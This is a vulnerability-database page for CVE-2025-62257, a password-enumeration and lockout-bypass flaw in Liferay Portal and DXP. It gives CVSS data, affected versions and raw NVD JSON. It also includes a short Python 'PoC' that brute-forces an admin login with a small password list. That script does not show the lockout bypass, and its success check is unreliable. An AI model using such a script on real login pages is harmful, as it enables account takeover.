Security Vulnerability Report
中文
CVE-2025-62257 CVSS 5.3 MEDIUM

CVE-2025-62257

Published: 2025-10-30 00:15:35
Last Modified: 2025-11-10 21:37:25

Description

Password enumeration vulnerability in Liferay Portal 7.4.0 through 7.4.3.119, and older unsupported versions, and Liferay DXP 2024.Q1.1 through 2024.Q1.5, 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.10, 7.4 GA through update 92, and older unsupported versions allows remote attackers to determine a user’s password even if account lockout is enabled via brute force attack.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q3.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2024.q1.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2024.q1.2:*:*:*:*:*:*:* - VULNERABLE
Lifera Portal 7.4.0 - 7.4.3.119
Lifera DXP 2024.Q1.1 - 2024.Q1.5
Lifera DXP 2023.Q4.0 - 2023.Q4.10
Lifera DXP 2023.Q3.1 - 2023.Q3.10
Lifera DXP 7.4 GA - Update 92

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC代码示例 import requests import time target_url = "http://target-liferay.com/c/portal/login" test_user = "admin" password_list = ["password", "admin", "123456", "letmein"] for pwd in password_list: data = { "login": test_user, "password": pwd } response = requests.post(target_url, data=data) if "Welcome" in response.text or response.status_code == 200: print(f"[+] Valid password found: {pwd}") break time.sleep(1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62257", "sourceIdentifier": "[email protected]", "published": "2025-10-30T00:15:34.907", "lastModified": "2025-11-10T21:37:25.233", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Password enumeration vulnerability in Liferay Portal 7.4.0 through 7.4.3.119, and older unsupported versions, and Liferay DXP 2024.Q1.1 through 2024.Q1.5, 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.10, 7.4 GA through update 92, and older unsupported versions allows remote attackers to determine a user’s password even if account lockout is enabled via brute force attack."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.4", "matchCriteriaId": "5F7BCC0B-5F36-4E6B-AABE-61B88E9A99D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.0:*:*:*:*:*:*:*", "matchCriteriaId": "B7B3A5E2-23CE-45A8-BD01-77024EB9F9A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5CE3202-2723-44A6-B63F-061138287FDA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2024.q1.1:*:*:*:*:*:*:*", "matchCriteriaId": "84E1655E-87BB-4490-8F65-EE8686546DF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2024.q1.2:*:*:*:*:*:*:*", "matchCriteriaId": "93A7FEFE-C60F-42E8-82BA-30015A4D476D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2024.q1.3:*:*:*:*:*:*:*", "matchCriteriaId": "FFA76949-2A0E-4786-968D-46CEEC4DC97C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2024.q1.4:*:*:*:*:*:*:*", "matchCriteriaId": "3FF38EA6-313C-4008-AC47-EA17F7F82D80"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2024.q1.5:*:*:*:*:*:*:*", "matchCriteriaId": "B9516741-5C31-41AB-B53E-9E42A145AF89"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.3.120", "matchCriteriaId": "1451AFB7-E0CC-40E1-9A92-0F7EC0AFA72F"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62257", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}